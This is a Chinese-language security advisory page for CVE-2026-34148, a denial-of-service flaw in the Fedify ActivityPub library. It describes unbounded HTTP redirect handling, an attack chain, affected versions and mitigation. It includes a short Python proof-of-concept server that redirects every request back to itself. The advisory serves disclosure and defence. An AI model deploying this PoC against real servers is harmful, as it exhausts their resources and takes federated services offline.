CVE-2026-34148 CVSS 7.5 高危

CVE-2026-34148 Fedify重定向导致拒绝服务漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34148

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Fedify

漏洞概述

Fedify是一个用于构建ActivityPub服务器的TypeScript库。在特定版本之前，其远程文档加载器在处理HTTP重定向时未设置最大重定向次数限制，也未检测访问URL循环。攻击者可利用此漏洞通过控制远程URL强制服务器进行大量出站请求，导致资源耗尽和拒绝服务。

技术细节

该漏洞存在于Fedify库的远程文档加载器及已认证文档加载器组件中。在处理ActivityPub协议的远程资源获取时，程序缺乏对HTTP重定向次数的上限控制，也未实现访问URL的循环检测。攻击者可构造恶意的远程ActivityPub密钥或Actor URL，构建无限重定向链。当受影响的服务器尝试加载该资源时，会陷入无限循环发送出站HTTP请求，导致服务器资源（如CPU、内存、网络连接）被迅速耗尽，从而引发拒绝服务攻击。

攻击链分析

STEP 1

步骤1

攻击者搭建恶意服务器，配置HTTP响应返回指向自身的301/302重定向。

STEP 2

步骤2

攻击者向使用Fedify的目标服务器发送包含恶意Actor或Key URL的ActivityPub交互请求。

STEP 3

步骤3

目标服务器的Fedify库尝试加载远程文档，自动跟随重定向。

STEP 4

步骤4

由于缺乏重定向次数限制，服务器陷入死循环，资源耗尽导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC: Malicious HTTP server causing infinite redirect loop
import http.server
import socketserver

class MaliciousHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Respond with 301 Redirect pointing to itself
        self.send_response(301)
        self.send_header('Location', self.path)
        self.end_headers()

PORT = 8080
with socketserver.TCPServer(("", PORT), MaliciousHandler) as httpd:
    print(f"Malicious server running at port {PORT}")
    httpd.serve_forever()

影响范围

Fedify < 1.9.6

Fedify < 1.10.5

Fedify < 2.0.8

Fedify < 2.1.1

防御指南

临时缓解措施

若无法立即升级，建议在网络边界实施出站流量监控和限制，防止服务器对单一域名发起过多请求，但这可能影响ActivityPub联邦功能的正常使用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表